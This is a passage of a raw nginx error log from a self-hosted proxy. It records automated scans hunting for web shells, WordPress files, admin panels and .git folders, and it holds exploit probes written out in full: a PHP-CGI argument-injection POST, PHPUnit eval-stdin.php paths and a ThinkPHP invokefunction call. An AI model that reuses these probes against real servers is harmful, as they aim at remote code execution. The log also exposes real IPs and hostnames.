such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /about.php//about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/k.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /k.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/X7x.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /X7x.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/class20.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /class20.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/lock360.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /lock360.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/themes.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /themes.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/gifclass4.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /gifclass4.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/xvent.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /xvent.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/file21.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /file21.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:20 [error] 243#243: *14891 open() "/var/www/html/class19.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /class19.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/166.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /166.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/bypass.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /bypass.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/plss3.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /plss3.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/t.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /t.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/bp.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /bp.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/wp-admin/user/about.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/user/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/geck.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /geck.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/wp-update.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-update.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/a.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /a.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/admins.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /admins.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/wp-configs.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-configs.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/temp.php/wp-update.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /temp.php/wp-update.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/wp.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/main.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /main.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/a1.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /a1.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/class.1.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /class.1.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/lala.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /lala.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/tox.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /tox.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/gg.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /gg.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/aaa.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /aaa.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/a2.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /a2.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/wp-content/upgrade/about.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-content/upgrade/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /index/function.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/admin/function.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /admin/function.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/wp-includes/assets/index.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/assets/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/wp-admin/images/index.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/to.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /to.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/class-admin.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /class-admin.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:27:21 [error] 243#243: *14891 open() "/var/www/html/nyan.php" failed (2: No such file or directory), client: 74.248.24.238, server: localhost-nginx-proxy-manager, request: "GET /nyan.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/30 23:37:10 [error] 243#243: *14895 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 00:00:51 [error] 243#243: *14903 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 00:12:17 [error] 244#244: *14906 "/var/www/html/.git/refs/index.html" is not found (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.git/refs/ HTTP/1.1", host: "91.82.215.191" +2026/01/31 01:39:29 [error] 245#245: *14947 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 52.169.124.184, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/31 01:39:29 [error] 245#245: *14947 open() "/var/www/html/rip.php" failed (2: No such file or directory), client: 52.169.124.184, server: localhost-nginx-proxy-manager, request: "GET /rip.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/31 03:34:44 [error] 250#250: *14979 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.163.15.207, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.215.191" +2026/01/31 04:12:54 [error] 251#251: *14996 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 65.49.1.182, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.215.191" +2026/01/31 04:15:06 [error] 253#253: *16486 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 65.49.1.182, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.215.191" +2026/01/31 05:11:09 [error] 252#252: *18013 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 206.168.34.33, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "91.82.215.191" +2026/01/31 05:30:05 [error] 253#253: *18023 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 80.82.77.202, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 05:30:05 [error] 253#253: *18025 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 80.82.77.202, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 05:30:16 [error] 253#253: *18027 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 80.82.77.202, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 05:30:16 [error] 250#250: *18029 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 80.82.77.202, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 05:42:51 [error] 250#250: *18032 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 07:57:08 [error] 251#251: *18075 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:35:56 [error] 251#251: *18086 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:17 [error] 252#252: *18092 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:18 [error] 252#252: *18092 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:19 [error] 252#252: *18092 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:19 [error] 252#252: *18092 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:20 [error] 252#252: *18092 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:21 [error] 252#252: *18092 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:21 [error] 252#252: *18092 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:22 [error] 252#252: *18092 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:22 [error] 252#252: *18092 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:23 [error] 252#252: *18092 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:24 [error] 252#252: *18092 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:24 [error] 252#252: *18092 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:25 [error] 252#252: *18092 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:25 [error] 252#252: *18092 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:26 [error] 252#252: *18092 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:26 [error] 252#252: *18092 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:27 [error] 252#252: *18092 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:28 [error] 252#252: *18092 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:28 [error] 252#252: *18092 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:29 [error] 252#252: *18092 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:29 [error] 252#252: *18092 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:30 [error] 252#252: *18092 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:30 [error] 252#252: *18092 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:31 [error] 252#252: *18092 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:32 [error] 252#252: *18092 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:32 [error] 252#252: *18092 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:33 [error] 252#252: *18092 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:34 [error] 252#252: *18092 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:34 [error] 252#252: *18092 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:35 [error] 252#252: *18092 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:35 [error] 252#252: *18092 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:36 [error] 252#252: *18092 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:36 [error] 252#252: *18092 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:37 [error] 252#252: *18092 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:38 [error] 252#252: *18092 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:38 [error] 252#252: *18092 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:39 [error] 252#252: *18092 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:40 [error] 252#252: *18092 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:40 [error] 252#252: *18092 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:41 [error] 252#252: *18092 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:44:43 [error] 252#252: *18092 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 45.78.235.71, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 08:46:44 [error] 258#258: *18100 open() "/var/www/html/console" failed (2: No such file or directory), client: 185.180.140.103, server: localhost-nginx-proxy-manager, request: "GET /console HTTP/1.1", host: "91.82.215.191" +2026/01/31 09:27:58 [error] 257#257: *18133 open() "/var/www/html/druid/index.html" failed (2: No such file or directory), client: 13.86.113.214, server: localhost-nginx-proxy-manager, request: "GET /druid/index.html HTTP/1.1", host: "91.82.215.191" +2026/01/31 09:40:51 [error] 257#257: *18141 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/31 09:51:39 [error] 258#258: *18150 open() "/var/www/html/ncsi.txt" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1", host: "www.msftncsi.com", referrer: "http://91.82.215.191/" +2026/01/31 09:51:39 [error] 258#258: *18151 "/var/www/html/HNAP1/index.html" is not found (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /HNAP1/ HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/31 09:51:39 [error] 258#258: *18152 open() "/var/www/html/sqlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /sqlite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/31 09:51:39 [error] 258#258: *18153 open() "/var/www/html/sqlitemanager/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /sqlitemanager/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/31 09:51:39 [error] 258#258: *18154 open() "/var/www/html/SQLiteManager/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLiteManager/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/31 09:51:39 [error] 258#258: *18155 open() "/var/www/html/SQLite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLite/main.php HTTP/1.1", host: "91.82.215.191", referrer: 